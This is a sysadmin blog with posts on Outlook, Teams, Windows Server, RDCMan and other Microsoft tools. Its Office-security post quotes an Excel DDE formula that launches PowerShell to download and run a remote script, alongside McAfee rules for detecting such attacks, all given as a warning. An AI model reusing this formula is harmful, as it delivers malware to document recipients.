Главная


Showing posts with label microsoft. Show all posts
Showing posts with label microsoft. Show all posts

Monday, 14 July 2025

Відпустка та Outlook.

Привіт, привіт.

На час відпустки користувач в Outlook О365 для Windows зобов'язаний створити автоматичну відповідь про свою відсутність на робочому місці. Вона автоматично діє і для Teams.

Як це робиться?

У програмі Outlook виберіть Файл > Автоматичні відповіді (поза  офісом) .

У полі «Автоматичні відповіді» виберіть «Надсилати автоматичні відповіді» .

Виберіть «Надсилати лише протягом цього періоду», щоб указати, коли слід надсилати повідомлення про відсутність на роботі. Якщо ви не встановите період часу, автоматичні відповіді продовжуватимуть надсилатися, доки їх не буде вимкнено вручну.

На вкладці «Усередині моєї організації» введіть повідомлення, яке ви хочете надсилати іншим користувачам O365, коли ви поза офісом.


В принципі більшість користувачів на цьому і закінчують налаштування, бо тим хто НЕ входить до штату організації вони нічого надсилати не збираються. І це вірно згідно правил інформаційної безпеки.

Але Outlook тут має свою підступність - коли ви тиснете кнопку  «ОК», щоб застосувати зміни він викидає вікно помилки. І чого б це?(((

А справа в тому що  Outlook по замовченню ВМИКАЄ позначку для опції «Автоматична відповідь людям поза моєю організацією» і чекає коли ви введете туди відповідний текст.  Хоча ви до тієї вкладки ще навіть не заходили.

Тому ОБОВ'ЯЗКОВО заберіть позначку з опції «Автоматична відповідь людям поза моєю організацією». А тепер впевнено натисніть кнопку  «ОК», щоб застосувати ваші зміни.

Ось тепер все. Щасти.

Saturday, 11 January 2025

Cюрприз від Outlook.

Привіт привіт,

Зовсім коротко - маю для вас сюрприз від Microsoft. А точніше від Outlook.

Так, ми знаємо що для зручності в клієнті Outlook можно створювати правила обробки вхідної пошти, і вони працюють як фільтри за різними ознаками листа: тема, адресат тощо. 

Але ось що цікаво - вчорашній випадок показав що правило спрацює навіть тоді коли визначена ланка, наприклад тека для переміщення листа за ознакою, відсутня. Тобто користувач випадково видалив одну теку на яку було налаштовано одне з правил переміщення, і коли прийшов лист то правило спрацювало, і він перемістився в ... нікуди. Без останку!

Спочатку була підозра що листи зовсім не приходять, але коли включили підтвердження на доставку то все стало зрозуміло. При цьому ніяких повідомлень типу "не можу премістити" Outlook користувачу не надає.

Такі справи.

Thursday, 2 January 2025

Створення власного емодзі в Teams.

Привіт привіт. 

Користувачі Teams можуть створювати власні емодзі з зображення або GIF-файлу для будь-кого в своїй організації, щоб використовувати їх як додаткові реакції в чатах.

Увага: 

  • адміністратор може обмежити користувачів, які можуть створювати настроювані емодзі, перш ніж їх можна буде використовувати. Крім того, будь-який користувач може клацнути правою кнопкою миші будь-який спеціальний емодзі, щоб побачити, хто його створив і коли.
  • адміністратор так само може обмежити користувачів, які можуть видаляти настроювані емодзі, тобто ви зможете його створити, але не зможете видалити потім.

Щоб створити настроюваний емодзі:

  1. Виберіть Емодзі, GIF-файли та наклейки Teams для чату у правій частині вікна повідомлення, а потім виберіть Емодзі.
  2. Внизу ви побачите різні варіанти емодзі. Виберіть Емодзі вашої організації - крайня справа іконка.
  3. Ліворуч виберіть Додати емодзі, тобто кнопка "+" , щоб вибрати будь-яке своє зображення. 

Вибираючи емодзі для завантаження, дотримуйтеся наступних рекомендацій: передавайте файли JPEG, PNG або GIF. Радимо використовувати квадратні зображення маленького розміру. 

Доданий новий емодзі у вас буде доступний відразу, а у решти користувачів організації за кілька днів.

Ось така фішка від Microsoft.

Щасти.

Wednesday, 24 July 2024

Відновлення Microsoft Teams Meeting Add-in.

Всім привіт.

Так вже трапляється що деякі оновлення не тільки покращують, але і шкодять. От так трапилося з плагіном Teams для Outlook, що він зник з календаря зовсім, і немає його ні у відключених надбудовах, ні у працюючих. Хоча на диску він повністю присутній.

Як фіксити?

Можно пройтися шляхом "Видалив та Поставив".

Можно шляхом тотального аудиту місць перебування плагіну.

А можно короткими патчами реєстру та системи.

Фіксимо так:

1) робимо від адміна (міняємо USERNAME на логін користувача!)

C:\WINDOWS\system32\regsvr32.exe "C:\Users\USERNAME\AppData\Local\Microsoft\TeamsMeetingAdd-in\1.24.14501\x64\Microsoft.Teams.AddinLoader.dll"

Sunday, 21 April 2024

Восстановление разделов запуска Windows.

Всем привет.

Windows обладает достаточно сложной структурой раздела запуска, в немалой степени по той причине, что в более старых системах BIOS вредоносным программам было слишком просто заразить единственный раздел запуска и либо целиком стереть его (некоторые даже стирали саму BIOS), либо внедрить себя в раздел запуска, что существенно осложняет его удаление. Если вы откроете Windows и инструмент разбиения на диска на разделы, вы обнаружите, что в вашем диске установки (Disk 0) у вас имеется некий раздел запуска EFI 100МБ и затем ваш раздел Windows с разделом Восстановления в самом конце, в котором расположены инструменты Консоли восстановления (см. Рисунок).


 

Windows выглядит как обладающая одним разделом для запуска и одним для восстановления По правде говоря, Windows намеренно скрывает важные моменты, чтобы обеспечивать невозможность получения вредоносным ПО к ним доступа с целью их заражения. 

Значения размера и положения разделов запуска Windows могут отличаться от одного ПК к другому, скажем при обновлении ПК с Windows 10, или даже с Windows 8.1 на Windows 11. Эти разделы могут находиться в разных местах диска или иметь разные размеры.

Saturday, 9 March 2024

Обновление версии Windows Server.

Всем привет.

Использование современной версии Windows Server позволит нам внедрять новые функции этой ОС, получить высокую безопасность и более высокую производительность. Сейчас есть два канала распространения LTSC (Long-term servicing channel) – релиз с 5-летней основной и 5-летней расширенной поддержкой и Semi-Annual Channel – версии, которые выходят гораздо чаще, примерно каждые полгода, имеют основной цикл поддержки 6 месяцев, а расширенную в течение 18 месяцев. Компании, использующие Semi-Annual канал получают возможность использовать все самые новые функции, например, контейнеры с Linux и совместную работу с облачной платформой Azure.

По представленной ниже схеме можно выбрать путь обновления («Обновление на месте») до Windows Server 2019, в зависимости от используемой на текущий момент версии. 


 Есть несколько путей обновления с предыдущих версий Windows Server:

  • «Обновление на месте» используется, если вы хотите сохранить все установленные роли, настройки и приложения. Рекомендуется сделать предварительный backup данных. Такое обновление происходит путем запуска программы установки (setup.exe) с установочного носителя в работающий системе. Вначале инсталлятор предложит вам загрузить необходимые обновления и драйвера, затем предстоит выбрать необходимую редакцию. Далее будьте внимательны! Следующий параметр выбрать «Сохранить мои данные и приложения». После нескольких перезагрузок вы получите новую ОС.
  • «Чистая установка». Полное удаление старой ОС путем установки новой ОС. Предварительно вам нужно будет сделать резервную копию данных и список установленного программного обеспечения. 
  • Миграция. Производится установка новой ОС на другом оборудовании или на виртуальной машине. Затем поочередно переносятся все роли, работающие на старом сервере и данные. Для этого шага рекомендуется иметь предварительный план миграции. 
  • Обновление кластера. При выборе этого пути, вам будет нужно последовательно обновить все узлы кластера на новую ОС, причем весь процесс происходит без остановки сервисов, т.е. этот вариант позволяет избежать простоев. Как и с миграцией у вас должен быть четкий план действий.  
  • Преобразование лицензии. Выполняется повышение редакции. Например, сервер под управлением Windows Server 2016 Standard можно повысить до Server 2016 Datacenter. Внимание! Преобразование лицензии работает только в одну сторону, в сторону повышения редакции. Для этого используется встроенная утилита DISM и соответствующий ключ продукта. Запускаем от имени Администратора PowerShell и последовательно вводим команды:

dism /Online /Get-CurrentEdition //в ответ увидим установленную редакцию

dism /Online /Get-TargetEditions //покажет до какой редакции можно обновиться

И чтобы перейти на другую редакцию нужна команда: 

DISM.exe /Online /Set-Edition:ServerDatacenter /AcceptEula /ProductKey:<product_key>

Где ServerDatacenter – нужная редакция, AcceptEula – согласие с лицензией, <product_key> - ваш ключ продукта. После применения команды, сервер должен быть перезагружен.  

Для активации компьютеров в вашей сети может использоваться ключ многократной установки (Multiple Activation Key) или KMS (Key Management Service). KMS начинает работать, если счетчик наберет от 25 клиентских (5 для серверных) запросов на активацию. Кроме этого, необходимо чтобы компьютеры минимум раз в 180 miдней могли подключиться к KMS серверу. Иначе активация «слетает» и Windows переходит в ознакомительный режим. Ключ MAK активирует систему один раз, используя сервера активаций Майкрософт:

slmgr /ipk <product_key>

cscript c:\windows\system32\slmgr.vbs /skms kms03.forza.com:1688

cscript c:\windows\system32\slmgr.vbs /ato

Удачи.

Thursday, 28 December 2023

Утилита RDCMan.

Всем привет.

Одним из инструментов реально облегчающим работу ИТ-администратора в Windows является RDCMan (Remote Desktop Connection Manager).

Утилита RDCMan - удобный менеджер RDP соединений для системного администратора Windows, позволяющая управлять в одном окне большим количеством RDP подключений, создавать древовидные структуры с удаленными Windows серверами и рабочими станциями (с которыми вы постоянно работаете или управляете). В RDCMan вы можете использовать различные параметры RDP подключения для отдельных серверов и групп и сохранять учетные данные администратора (пользователя) для автоматической авторизации на RDP серверах, что избавляет от рутины и здорово экономит время.

Сегодня мне трудно представить как же я обходился без него ранее.

Последняя официально-доступная версия RDCMan 2.7 была выпущена в 2014 году и тех пор ее развитие остановилось. Кроме того, в этой версии был выявлена критическая уязвимость и Microsoft решила полностью удалить страницу загрузки RDCMan в 2020 году. Однако в июне 2021 года Марк Русинович заявил, что утилита RDCMan переходит в состав инструментов Sysinternals и продолжит развитие. Марк, спасибо тебе огромное! Новая версия Remote Desktop Connection Manager 2.81, в которой были исправлены уязвимости была выпущена в 24 июня 2021 года.

Утилита RDCman является бесплатной и доступна к загрузке на сайте Microsoft. Актуальная версия доступна по ссылке https://docs.microsoft.com/en-us/sysinternals/downloads/rdcman.

Последняя версия RDCMan 2.93 поставляется в виде portable приложения RDCMan.exe и не требует установки. Просто скачайте архив RDCMan.zip и распакуйте его в нужный каталог. Remote Desktop Connection Manager поддерживаются все современные версии Windows, вплоть до Windows 11 и Windows Server 2019. Поддерживаются также Windows XP и Windows Server 2003, но на этих ОС нужно предварительно установить клиент RDP версии 6 версии и выше.

Как ею пользоваться смотрите здесь.

Wednesday, 30 August 2023

ROOP и ComfyUI.

Всем привет.

Существует определенная проблемка с популярным расширением ROOP как для A1111 так и для ComfyUI. Особенности его установки заключаются в том что оно требует предварительной, хотя и одноразовой, компиляции своих пакетов с MS VС++. Не могу сказать почему автор не задейстовал его с МS VC++ Redistributable, но реальность такова что для его нормальной работы необходимо доустанавливать как минимум Visual Studio Build Tools.

Вот один любитель Stable Diffusion посвятил этому отдельное видео.


В принципе эти проблемы из-за пакета insightface, который даже можно доинсталировать вручную, как советует автор ролика, но и это не решает проблему которая обычно выглядит вот так:

### ComfyUI-FaceSwap: Check basic models

Traceback (most recent call last):

  File "C:\SDComfyUI\ComfyUI\nodes.py", line 1693, in load_custom_node module_spec.loader.exec_module(module)

  File "<frozen importlib._bootstrap_external>", line 883, in exec_module

  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed

  File "C:\SDComfyUI\ComfyUI\custom_nodes\ComfyUI-FaceSwap\__init__.py", line 4, in <module>     from .FaceSwapNode import FaceSwapNode

  File "C:\SDComfyUI\ComfyUI\custom_nodes\ComfyUI-FaceSwap\FaceSwapNode.py", line 1, in <module>  import insightface

  File "C:\SDComfyUI\python_embeded\lib\site-packages\insightface\__init__.py", line 18, in <module> from . import app

  File "C:\SDComfyUI\python_embeded\lib\site-packages\insightface\app\__init__.py", line 2, in <module> from .mask_renderer import *

  File "C:\SDComfyUI\python_embeded\lib\site-packages\insightface\app\mask_renderer.py", line 8, in <module> from ..thirdparty import face3d

  File "C:\SDComfyUI\python_embeded\lib\site-packages\insightface\thirdparty\face3d\__init__.py", line 3, in <module> from . import mesh

  File "C:\SDComfyUI\python_embeded\lib\site-packages\insightface\thirdparty\face3d\mesh\__init__.py", line 9, in <module> from .cython import mesh_core_cython

ImportError: DLL load failed while importing mesh_core_cython: The specified module could not be found.

Thursday, 8 December 2022

Период кеширования в Outlook 365.

Всем привет.

Возвращаясь к теме кеширования в MS Outlook и общаясь с специалистами пришел к выводу что все таки лучше его оставить. Особенно сейчас когда пользуешся Office 365, но имеешь перебои с интернетом. Период кеширования ставим не менее месяца, можно три.


Остальное как на слайде. Успехов.

Thursday, 13 October 2022

Сканируем Mikrotik RouterOS.

Всем привет.

Вы знаете, Microsoft иногда выдает на гора полезные штуки. Давненько так я писал вам про их кофе. А вчера узнал что Microsoft приложила руку к диагностике Mikrotik RouterOS на уязвимости.

Обьяснялось это тем что сам Mikrotik не прилагает достаточных усилий к безопасности своей RouterOS. Поэтому, мол, за все это время RouterOS, особенно старые ее версии, накопили достаточно дыр. Как их латать и чем это вопрос к разработчику, ну а Microsoft ограничилась бесплатным инструментом RouterOS Scanner.

Что же этот сканер может выявить:

  • get the version of the device and map it to CVEs
  • check for scheduled tasks
  • look for traffic redirection rules
  • look for DNS cache poisoning
  • look for default ports change
  • look for non-default users
  • look for suspicious files
  • look for proxy, socks and FW rules.

Как это работает? В принцпе все просто, делаем клон репозитория, запускаем виртуальное окружение в Python и щупаем нашу Mikrotik RouterOS.

Вывод сканера включает 3 раздела для каждого теста:

  • raw data - данные, которые мы ищем.
  • suspicious - CVE, которые мы обнаружили как подозрительные, должны быть проверены, являются ли они законными или вредоносными.
  • recommendation - обнаруженные нами слабые места в безопасности и рекомендации по их устранению.

Для локального теста я развернул RouterOS v5.26 прямо в VirtualBox. 

Wednesday, 4 May 2022

Microsoft DPM и его нюансы.

Всем привет.

Даже в крупных предприятиях не для всех серверов применяются средства резервного копирования. С одной стороны - за ненадобностью, а с другой ограниченный бюджет, поэтому особое внимание уделяется только архиважным сервисам и файлам. Для них системный администратор настраивает бэкапы с помощью встроенных или дополнительно установленных программ, экспорт данных и другое. Таким образом производится подстраховка, защита сервера от непредвиденных явлений. Однако не всегда получается возобновить работу сервера за короткий промежуток времени, а выход из строя операционной системы как минимум заберёт несколько часов на её переустановку и донастройку. Сроки постоя серверов заставляют задуматься о способах их минимизации.

В нашем случае целесообразно использовать продукт Microsoft System Center Data Protection Manager (DPM), который является очень полезным инструментом для резервирования и восстановления потерянной или искажённой информации на предприятии. Централизованное и удобное управление бэкапами, разделение резервных копий по группам, настройка индивидуального расписания для хранения относятся к ключевым факторам при первоначальном выборе продукта и дальнейшей повседневной работе в большой ИТ-инфраструктуре. Этот архивариус великолепно справляется с задачей по возврату в предаварийное состояние баз данных, серверов, содержимого пользовательских компьютеров. За счёт автоматизации процессов DPM позволяет сократить массу времени, избегая долгих донастроек Microsoft-продуктов вручную при полной их переинсталляции.

Как и с другими продуктами Microsoft DPM имеет свои нюансы.

Например легко учитываются для зашиты сервера из того же домена, что и сам сервер DPM. Но надо отметить, что можно выбрать сервер не только из того же самого домена, в котором находится DPM-сервер, но и другой, но связанный двусторонними(!) доверительными отношениями с доменом, которому принадлежит DPM-сервер. В этом случае надо будет набрать в поле «Computer Name» полное доменное имя (FQDN) требуемого компьютера. DPM-агент уже должен быть уже установлен. 

В этом случае мы вынуждены выполнить ручную привязку DPM-агента к серверу.

Если Server в другом domain-е то необходимо ввести логин и пароль доменной учетной записи, которая имеет права локального администратора на тех компьютерах, куда мы устанавливаем агенты защиты.

Tuesday, 5 April 2022

Цифровий спадок.

Всім доброго дня.

У сучасному світі значна частина інформації зберігається у цифровому вигляді і часто має дуже велике значення та цінність на рівні з іншими активами та фізичними документами. Компанія MEV провела невелике дослідження на цю тему. Питання було одне - як написати заповіт щодо персональної цифрової інформації довіреним особам у відомих сервісах?

Google.

Ваш обліковий запис Google зберігає в собі колосальний обсяг інформації. Мабуть, навіть більший, ніж ви самі про те підозрюєте. Крім цілком очевидних фотографій з «Google Фото», документів, є файли у Google Drive, історії пошукових запитів і повідомлень електронної пошти. Там також зберігаються записи ваших звернень до Google Асистенту, історія переміщень та звернень до завантажених у пристрій додатків.

Google дозволяє або видалити ваш акаунт, або надати дані з нього довіреним особам завдяки налаштуванням «Про всяк випадок». Компанія пропонує або просто деактивувати ваш акаунт після 3-18 місяців, або надати доступ до частини даних обраним користувачам. 

Як налаштувати умови надання ваших даних довіреним особам:

  1. Перейдіть за посиланням на сторінку «Про всяк випадок»;
  2. Натисніть «Почати», уточніть період бездіяльності, після закінчення якого акаунт буде видалений, а потім виберіть контакти, за якими вас можна буде заздалегідь про це сповістити;
  3. Ви можете вибрати термін деактивації і контакти, за якими вас про неї потрібно сповістити;
  4. Виберіть довірену особу, якій ви надасте доступ до своїх даних, і вкажіть її електронну пошту;
  5. Виберіть дані, які ви готові надати довіреній особі, і підтвердіть внесення змін.

Facebook.

Тут ще простіше - для передачі облікового запису Facebook автоматично у разі відсутності активності – налаштуйте автоматичне видалення або «Спадкоємця»: 

«Settings» - «General» - «Memorialisation»

Microsoft.

З Microsoft трошки складніше -  сервіси від Microsoft пропонують 2 варіанти розвитку подій:

  • або забезпечити автоматичну передачу логіну та паролю довіреній особі.
  • або у разі рішення до автоматичного видалення облікового запису, окремих дій не потрібно робити - тобто у разі відсутності активності обліковий запис деактивується через 2 роки автоматично.

Опції щодо автоматичної передачі паролю в Microsoft я так і не знайшов. Врешті решт, я гадаю, що варто просто вести записи своїх паролів в KeePass, або в його онлайн аналозі. Але завчасно потурбуватись щоб доступ до цього записника мала ваша довірена особа.

Щасти.

Слава Україні!

Monday, 1 November 2021

Клонирование физического хоста в Hyper-V.


Всем привет.

Вчера задача была такова что мне понадобилось создать клон одного физического хоста и перенести его на платформу Hyper-V. Из всех конвертеров для Hyper-V самым удобным для этой операции мне представился Disk2VHD. Он создан инженерами Microsoft, имеет малый размер, запускается без инсталяции. 

Перед операцией клонирования рекомендую тщательно почистить сам хост: корзина, кеши, сессии пользователей.

Далее запускаем Disk2VHD на нашем целевом хосте. Как показано на рисунке интерфейс программы очень простой. 


Чтобы создать диск VHDX, ставим флажок Use Vhdx. VHDX - это формат диска, появившийся в Windows Server 2012. По сравнению с традиционным VHD, в VHDX был внесен ряд изменений: появился специальный внутренний журнал, снижающий вероятность повреждения данных, увеличилась емкость (до 64 ТБ), добавлены некоторые другие функции.

Также выбираем Use Volume Shadow Copy если вы хотим получить копию диска, согласованную на уровне транзакций, а не сбоев. Выбираем место, где будет находиться файл VHDX (если оно будет расположено на том же диске, возможно «поглощение», поэтому для хранения образа лучше использовать другой жесткий диск). Выбираем любой диск/том, который нужно виртуализовать. Если вы хотите сделать этот диск загрузочным, необходимо включить туда системный диск и область загрузки (поставьте флажок System Reserved (Зарезервировано системой)). Нажимаем Create (Создать), чтобы начать преобразование.

Чтобы использовать созданный VHDX-диск, необходимо создать новую ВМ Hyper-V.  Запустите мастер (New → Virtual Machine) в менеджере Hyper-V и настройте ее в соответствии со своими требованиями. Дойдя до шага Connect Virtual Hard Disk (Подключение виртуального жесткого диска), необходимо настроить полученный виртуальный диск. Найдите уже созданный диск, сошлитесь на него, и выполните оставшиеся действия с помощью мастера.

Вот здесь такие шаги описаны более подробно, и даже с рисунками.

В конце добавлю то что я пропустил в самом начале процесса - мой хост был в домене. Логичнее было бы его вывести из домена перед клонированием, сделать клон, и вернуть еще раз в домен. Я этого тогда не сделал, и у меня получилось два близнеца, из которых успешно мог работать только один. Но не все потеряно. Нужно было переименовать клон не выкинув при этом физический хост из домена.

Решение было следующее - отключаем у клона сеть, и выводим его из домена. Следом даем ему другое имя, включаем сеть и вводим в домен. Вуаля! Близняшки работают вместе.

Удачи.

Monday, 12 July 2021

Безопасность в MS Office.


Всем привет.

Как показывает практика популярным потоком заражения любой компании вирусом является  путь забрасывания файлов (обычно email) как документов на канцелярию, бухгалтерию, и, реже, на само руководство. Руководство на такие документы ведется редко, а вот какой-нибудь бухгалтер может с перепугу и открыть его если в теме будет красоваться типа "Неуплаченные налоги на...".

Поэтому правильная настройка офисных инструментов это половина успеха, вторая половина это обучаемость персонала как минимум не открывать документы полученные по почте, если там вдруг всплывает просьба о включении макроса или обновления внешних связей. Потму как, к примеру, наш добрый Excel легко допускает в формулах такое:

=cmd|' /c C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://cloudfront.com/1.dat\"))'|A0'

Про самообучаемость я писал ранее, а сегодня говорим про техническую сторону зашиты, по презентации Владислава Радецкого.

Что же следует сделать в MS Office? Определить следующие параметры.

Параметры ActiveX/Параметры для все пpиложений Office:

Выбрано - выводить запрос перед включением всех элементов управления с миниимальными ограничениями

Включено - безопасный режим (помогает ограничить доступ элементов управления к вашему компьютеру)

Защищенный просмотр: выбраны все три.

Для MS Word -

Параметры макросов:

Выбрано  - Отключить все макросы с уведомлением

Отключено - Доверять доступ к обьектной модели проектов VBA.

Для MS Excel -

Внешнее содержимое/Параметры безопасности на подключение к данным:

выбрано - запрос на подключение к данным.

Параметры безопасности для связей в книге:

выбрано - запрос на автоматическое обновление связей в книге.


Если вы используете McAfee ENS, то активировать следующие политики в Policy Category/ Exploit Prevention для всех типов обьектов:

6131 T1047 - Weaponized OLE object infection via WMI: Block+Report

6109 T1407 - Powershell - Suspicious wmi script execution: Block+Report

6108 Powershell - Suspicious downloading string execution: Block+Report

6127 Suspicous LSASS Access from Powershell: Block+Report

Успехов!

Monday, 12 April 2021

MS Outlook и летнее время.

Всем привет.

Увы, но мы опять перешли на летнее время хотя проку от него никакого. Многие страны нашли смелость от этого отказаться. Но наша ИТ-инфраструктура дружно щелкнула часами и ушла на час вперед.

Хм, а вот с переходом на летнее время открылись и новые тайны в MS Outlook. Например, Вы можете начать получать все письма с меткой времени получения ровно час тому. Оказалось что почтовый клиент MS Outlook имеет свои собственные настройки часовых поясов и системное время вашего ПК не является для него определяющим. В настольном клиенте они меняются в Параметры/Календарь/Часовые пояса. Однако это еще не все. Облачный клиент MS Outlook 365 также имеет возможность задания часового пояса и находится он уже в Параметры/Общие/Часовой пояс.

Также следует обратить внимание на точное указание именно вашего часового пояса, а не любого другого совпадающего с вашим местонахождением, например с GMT+2. Ибо не всякая страна находящаяся с вашей на одном меридиане переходит на летнее время.

Удачи.

Thursday, 7 January 2021

Power Automate - первый старт.

Всем привет. 

Рассказывая про Power BI нам мимоходом упомянули про Microsoft Power Platform. На этой платформе Microsoft сделала ставку на силу и собрала под одной крышей сервисы Power Apps, Power BI, Power Automate и Power Virtual Agents.

Поскольку для Power BI надо хорошо знать Power Query в котором я пока плаваю, я решил попробовать по ходу Power Automate чисто из практических целей для моей работы.

Microsoft Power Automate (ранее Microsoft Flow) - облачный сервис автоматизации рутинных и повторяющихся действий и рабочих процессов, позволяющий создавать быстрые и эффективные инструменты сбора и обработки данных из различных источников. 

Анонсы утверждают что Power Automate позволяет быстро типовые процедуры обмена информацией между приложениями и WEB-службами, ее синхронизацию на локальных и облачных ресурсах, перевод и сохранение в нужном формате и на нужных ресурсах. Эти процессы можно использовать для сбора данных, синхронизации файлов, получения уведомлений и других целей. 

Основная идея Microsoft Power Automate - потоки (flows), которые связывают события и последовательности действий (такими событиями и последовательностями могут быть службы и приложения) и передают данные между приложениями (как облачными, так и локальными). Потоки могут запускаться автоматически по событию, запускаться вручную нажатием кнопки или запускаться по расписанию. При этом Power Automate включает возможности логического ветвления потоков в зависимости от выполнения условий и выполнения операций над передаваемыми данными. Например, получение письма на заданный адрес может служить признаком запуска определенных процедур в том или ином приложении. При необходимости для разработчиков доступны API.

Пример 1.

Ну что ж, пробуем самое простое - хочу получать прогноз погоды. Все сообщения направляем себе на почту. Хотя также легко можно организовать push-сообщения на телефон.

Тут есть такая особенность - если вы находитесь там же и где и ваш провайдер интернет тогда можете использовать встроенные динамические переменные (долгота и широта), если же нет, то лучше указывать ваши GPS-координаты. Но не факт, что в MSN имеется прогноз погоды именно для вашей местности.

Wednesday, 2 September 2020

Переадресация почты в Outlook.

Всем привет.

Оказывается пользователь Outlook имеет больше возможностей по управлению потоками своих писем чем думает. Или ему просто лень это использовать. Возьмем самое простое - делегирование корпоративной почты на время своего отпуска. Тут даже администратор не нужен.

Итак вариант desktop-a.

1. Заходим в закладку «Файл» и выбираем «Управление правилами и оповещениями»



2. Далее нажимаем на закладку «Создать правило».
3. Открывается «Мастер правил». Выбираем «Применить правило полученным мной сообщений» и нажимаем «Далее».


Tuesday, 3 March 2020

Microsoft Office Alerts.

Всем привет.

Случается что приложения MS Office себя ведут непредсказуемо. Ситауция напрягает когда надо выяснить причину сбоя апостеори. Но насколько я помню в старых версиях MS Office создавал свои журналы событий в Windows из которых можно было извлечь хоть какую то информацию.

2007
(Get-EventLog -LogName "OSession" -Source "Microsoft Office 12 Sessions" -EntryType "Information" -Message "*Microsoft Office*session lasted*" -Newest 1).TimeGenerated;

Не увидев этих  журналов в Windows 8/10 я уж было решил что все события ложаться в один их журналов самой Windows. Но к счастью ситуация изменилась не так кардинально. Просто теперь журнал MS Office один и находится глубже:
Журналы приложений и служб/Microsoft Office Alerts
а файл его такой
%SystemRoot%\System32\Winevt\Logs\OAlerts.evtx

Обращайте внимание на имя источника событий в зависимости от версии MS Office:
2010
(Get-EventLog -LogName "OAlerts" -Source "Microsoft Office 14 Alerts" -EntryType "Information" -Newest 1).TimeGenerated;

2013
(Get-EventLog -LogName "OAlerts" -Source "Microsoft Office 15 Alerts" -EntryType "Information" -Newest 1).TimeGenerated;

2016
(Get-EventLog -LogName "OAlerts" -Source "Microsoft Office 16 Alerts" -EntryType "Information" -Newest 1).TimeGenerated;

А вот и пример события из журнала. Самые безобидные события могут вам сказать какой файл обрабатывался на вашем ПК и когда:
Имя журнала:   OAlerts
Источник:      Microsoft Office 16 Alerts
Дата:          10.11.2019 20:58:37
Код события:   300
Категория задачи:Отсутствует
Уровень:       Сведения
Ключевые слова:Классический
Пользователь:  Н/Д
Компьютер:     Prongeng
Описание:
Microsoft Word
Вы хотите сохранить изменения в ReviewMuseum.docx?
P1: 200054
P2: 16.0.4266.1001

Это, кстати, не единственный  источник такой информации.)
Успехов.

Wednesday, 13 November 2019

Инструменты удаленного управления ПК #3.

Всем привет.

Продолжая шерстить инструменты удаленного управления ПК нашел еще один обзор. Я его взял за основу и немного дополнил.

Chrome Remote Desktop

Google имеет собственную реализацию удаленного рабочего стола, работающую как приложение для Google Chrome (при этом доступ будет не только к Chrome на удаленном компьютере, а ко всему рабочему столу). Поддерживаются все настольные операционные системы, на которые можно установить браузер Google Chrome. Для Android и iOS также имеются официальные клиенты в магазинах приложений.

Для использования Chrome Remote Desktop потребуется загрузить расширение браузера из официального магазина, задать данные для доступа (цифровой пин-код), а на другом компьютере - подключиться с использованием этого же расширения и указанного пин-кода. При этом для использования удаленного рабочего стола Chrome обязательно требуется войти в свой аккаунт Google (не обязательно один и тот же аккаунт на разных компьютерах). Из сетевых ресурсов он использует WebRTC, UDP-трафик, и трафик через TCP-порты 443 (HTTPS) и 5222 (XMPP).

Среди преимуществ способа - безопасность и отсутствия необходимости установки дополнительного ПО, если вы и так пользуетесь браузером Chrome. Из недостатков - ограниченная функциональность. Самой собой ваш браузер Chrome должен быть последней версии. Из под Firefox у меня подсоединиться не удалось, хотя возможность такую  Chrome Remote Desktop дает.

Microsoft Remote Desktop

Удаленный рабочий стол Microsoft хорош тем, что для удаленного доступа компьютеру с его помощью не требуется установки какого-либо дополнительного программного обеспечения, при этом протокол RDP, который используется при доступе, в достаточной мере защищен и хорошо работает.

Но есть и недостатки. Прежде всего, в то время как подключиться к удаленному рабочему столу вы можете, не устанавливая дополнительных программ со всех версий Windows 7, 8 и Windows 10 (а также с других операционных систем, в том числе Android и iOS, загрузив бесплатный клиент Microsoft Remote Desktop), в качестве компьютера, к которому подключаются (сервера), может быть только компьютер или ноутбук с Windows Pro и выше. Еще одно ограничение - без дополнительных настроек и изысканий, подключение к удаленному рабочему столу Microsoft работает только если компьютеры и мобильные устройства находятся в одной локальной сети (например, подключены к одному роутеру в случае домашнего использования) или же имеют статические IP в Интернете (при этом находятся не за маршрутизаторами).

Friday, 20 September 2019

Запрещаем Simple Bind.

Всем привет.

Есть такая неприятная штука как Simple Bind. Simple Bind с точки зрения безопасности опасен тем, что сервисы, обращаясь к PDC по протоколу LDAP передают учетные данные вместе с паролями в открытом текстовом виде. Такие сервисы необходимо переконфигурировать на использование протокола LDAPS а при невозможности сделать это – принять другие меры по защите трафика и понизить привелегии проблемной учетной записи до минимально необходимых.

Для начала логирования событий Simple Bind нужно поменять значение ключа реестра на PDC.


Изменения применяются сразу, перезагрузка сервера не требуется.

Версия на печать

Популярное